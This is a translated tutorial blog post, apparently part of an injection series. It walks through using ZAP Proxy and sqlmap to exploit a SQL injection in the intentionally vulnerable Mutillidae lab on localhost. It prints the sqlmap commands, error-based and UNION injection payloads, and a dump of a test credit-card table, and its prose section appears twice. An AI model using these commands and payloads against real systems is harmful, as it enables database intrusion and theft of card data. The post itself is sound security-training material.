A1: 2017 - Injections (Part 3 and Last)
In my favorite computer game Quest for Glory 2: Trial by Fire, when the world is once again in danger, the protagonist enters the University of Wizards. After successfully passing the entrance examinations, the bearded wise wizards propose to enter this University, because, having finished it, we will understand all the intricacies of magic, learn all spells, and then we will definitely save our friends and defeat the world evil. The only problem is that 15-20 years to learn, and during this time the forces of evil will have time to win and not just once.
Every time I involuntarily recall this episode, when I have another interesting book or a pile of technical documentation in front of me. A lot of books have been written about time management, but for me it comes down to a simple formula: I figured out the basics, sorted out examples - then just automation!
Now that we’re just about how the injections work, so why not try to simplify your life and once again analyze some past example, but with the help of additional software. We need two tools:
Sqlmap - a tool that allows you to automate the search and exploitation of vulnerabilities in SQL and ZAP Proxy - a local proxy server, which is needed to analyze traffic between the browser in a web server.
Again, you need to mention that these are not the only such tools, and you will surely prove to you in a neighboring blog that you need to deal with sqlninja instead of sqlmap, and you don’t need to waste time on ZAP when there is a Burp. I will not argue with anyone.
To make life easier, we will start by intercepting the traffic between the client and the web server. The obtained data will be used as parameters for sqlmap. By and large, the URL of the vulnerable application can also act as such a parameter, but now the data from the proxy will be clearer for us.
We will work with the same example from A1, which we analyzed in the previous article (“SQLi - Extract Data”> “User Info (SQL)”).
Go to this page through our ZAP Proxy and enter some data. I understand that there is a great temptation to try something out of what we have learned, but right now you just need to enter any obviously wrong data. I enter my favorite admin / password and receive in interception this request:
Here we are primarily interested in the first line, namely the request. Sometimes it is useful to check whether we have intercepted. This can be done by repeating this generated request in the same browser. If we get the same page with an error, then we are on the right track.
Let's save our captured request as a separate file request_sqlmap.txt.
And now we will transfer this file for analysis in sqlmap:
We need the –banner parameter in order for sqlmap to try to determine which DBMS we are dealing with. In our example, this is not so important, but in practice you will be able to speed up testing, without being distracted by aspects of other DBMS that are not applicable to your goal.
The scan was completed successfully, and we once again saw that, in general, we already knew:
In addition, sqlmap determined that we are dealing with mysql, or rather its fork. Now let's see what databases are on the server:
Hereinafter we will specify our interception file as a parameter for sqlmap. In addition, we will specify the parameters that we already know: the type of the DBMS, as well as the -dbs switch , in order to get data about the existing databases:
Fine. Usually, the bases are given some meaningful names, or they are created automatically when installing applications. The principle of "Security by obscurity", of course, has not been canceled, but this is the exception rather than the rule. The most interesting thing in our case, apparently, is the mutillidae base, let's see what it consists of:
Here we will add the necessary DBMS and the –tables key to things we know to look at the tables in this database:
Already not bad. Especially promising is the credit_cards table. Let's look into it:
and get:
Wow, yes there is a whole table where credit card data should be stored! Since we came, let's look at this table:
Oops:
Here they are, our credit cards. Two questions should now sound in your head: how does it work and where does all this data come from?
How it works? Well, strictly speaking, just as if you were going through all the possible options, trying to randomly exploit this or that vulnerability.
But where the data come from, the question to the administrator, who posted such important information in such an inappropriate place.
Sqlmap has dozens of parameters that we cannot parse in one article. But the task of my articles is to introduce the decision, and then it is up to you. Try at your leisure to also dig the other bases and experiment with the parameters, perhaps credit cards are not the most interesting. =)
You can read the blog of the author of the article at this link .
Every time I involuntarily recall this episode, when I have another interesting book or a pile of technical documentation in front of me. A lot of books have been written about time management, but for me it comes down to a simple formula: I figured out the basics, sorted out examples - then just automation!
Now that we’re just about how the injections work, so why not try to simplify your life and once again analyze some past example, but with the help of additional software. We need two tools:
Sqlmap - a tool that allows you to automate the search and exploitation of vulnerabilities in SQL and ZAP Proxy - a local proxy server, which is needed to analyze traffic between the browser in a web server.
Again, you need to mention that these are not the only such tools, and you will surely prove to you in a neighboring blog that you need to deal with sqlninja instead of sqlmap, and you don’t need to waste time on ZAP when there is a Burp. I will not argue with anyone.
To make life easier, we will start by intercepting the traffic between the client and the web server. The obtained data will be used as parameters for sqlmap. By and large, the URL of the vulnerable application can also act as such a parameter, but now the data from the proxy will be clearer for us.
We will work with the same example from A1, which we analyzed in the previous article (“SQLi - Extract Data”> “User Info (SQL)”).
Go to this page through our ZAP Proxy and enter some data. I understand that there is a great temptation to try something out of what we have learned, but right now you just need to enter any obviously wrong data. I enter my favorite admin / password and receive in interception this request:
GET http://127.0.0.1/mutillidae/index.php?page=user-
info.php&username=admin&password=password&user-info-php-submit-
button=View+Account+Details HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://127.0.0.1/mutillidae/index.php?page=user-info.php
Cookie: showhints=1; PHPSESSID=aqvrdm615sm8k7isopefgbhega
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
Here we are primarily interested in the first line, namely the request. Sometimes it is useful to check whether we have intercepted. This can be done by repeating this generated request in the same browser. If we get the same page with an error, then we are on the right track.
Let's save our captured request as a separate file request_sqlmap.txt.
And now we will transfer this file for analysis in sqlmap:
sqlmap -r reqest_sqlmap.txt --banner We need the –banner parameter in order for sqlmap to try to determine which DBMS we are dealing with. In our example, this is not so important, but in practice you will be able to speed up testing, without being distracted by aspects of other DBMS that are not applicable to your goal.
[23:19:48] [INFO] GET parameter'username' is'Generic UNION query (NULL) - 1to20 columns' injectable
GET parameter'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of181 HTTP(s) requests:
--- Parameter: username (GET)
Type: error-based
Title: MySQL >= 5.0ANDerror-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)
Payload: page=user-info.php&username=admin' AND (SELECT5399 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(5399=5399,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND'UUZA'='UUZA&password=password&user-info-php-submit-button=View Account Details
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: page=user-info.php&username=admin' UNION ALLSELECTNULL,NULL,NULL,CONCAT(0x7171707871,0x4d754c5372467a65665a4c7672636e4c4a554777547162474e666f784e6b69754a43544a41675a50,0x71706a6271),NULL,NULL,NULL-- GGvT&password=password&user-info-php-submit-button=View Account Details ---
[23:20:10] [INFO] the back-end DBMS is MySQL
[23:20:10] [INFO] fetching banner
web server operating system: Windows
web application technology: Apache 2.4.29, PHP 7.2.3
back-end DBMS: MySQL >= 5.0
banner: '10.1.31-MariaDB'
[23:20:10] [INFO] fetched data logged totext files under '/home/belowzero273/.sqlmap/output/127.0.0.1'
The scan was completed successfully, and we once again saw that, in general, we already knew:
[23:19:48] [INFO] GET parameter'username' is'Generic UNION query (NULL) - 1to20 columns' injectable In addition, sqlmap determined that we are dealing with mysql, or rather its fork. Now let's see what databases are on the server:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL --dbsHereinafter we will specify our interception file as a parameter for sqlmap. In addition, we will specify the parameters that we already know: the type of the DBMS, as well as the -dbs switch , in order to get data about the existing databases:
[23:27:19][WARNING]reflectivevalue(s) foundandfilteringoutavailabledatabases[6]:
[*]information_schema[*]mutillidae[*]mysql[*]performance_schema[*]phpmyadmin[*]testFine. Usually, the bases are given some meaningful names, or they are created automatically when installing applications. The principle of "Security by obscurity", of course, has not been canceled, but this is the exception rather than the rule. The most interesting thing in our case, apparently, is the mutillidae base, let's see what it consists of:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae --tables Here we will add the necessary DBMS and the –tables key to things we know to look at the tables in this database:
[23:29:42] [WARNING] reflective value(s) found and filtering out
Database: mutillidae
[13 tables]
+----------------------------+
| accounts |
| balloon_tips |
| blogs_table |
| captured_data |
| credit_cards |
| help_texts |
| hitlog |
| level_1_help_include_files |
| page_help |
| page_hints |
| pen_test_tools |
| user_poll_results |
| youtubevideos |
+----------------------------+
Already not bad. Especially promising is the credit_cards table. Let's look into it:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credita_cards --columns and get:
[23:31:35] [WARNING] reflective value(s) foundand filtering outDatabase: mutillidae
Table: credit_cards
[4columns]
+------------+---------+
| Column | Type |
+------------+---------+
| ccid | int(11) |
| ccnumber | text |
| ccv | text |
| expiration | date |
+------------+---------+ Wow, yes there is a whole table where credit card data should be stored! Since we came, let's look at this table:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --dumpOops:
[23:32:42] [WARNING] reflective value(s) found and filtering out
Database: mutillidae
Table: credit_cards
[5 entries]
+------+-----+----------------------------+-----------------+
| ccid | ccv | ccnumber | expiration |
+------+-----+----------------------------+-----------------+
|1| 745 |4444111122223333| 2012-03-01 || 2 |722| 7746536337776330 |2015-04-01|
|3| 461 |8242325748474749| 2016-03-01 || 4 |230| 7725653200487633 |2017-06-01|
|5| 627 |1234567812345678| 2018-11-01 |
+------+-----+----------------------------+-----------------+
Here they are, our credit cards. Two questions should now sound in your head: how does it work and where does all this data come from?
How it works? Well, strictly speaking, just as if you were going through all the possible options, trying to randomly exploit this or that vulnerability.
But where the data come from, the question to the administrator, who posted such important information in such an inappropriate place.
Sqlmap has dozens of parameters that we cannot parse in one article. But the task of my articles is to introduce the decision, and then it is up to you. Try at your leisure to also dig the other bases and experiment with the parameters, perhaps credit cards are not the most interesting. =)
You can read the blog of the author of the article at this link .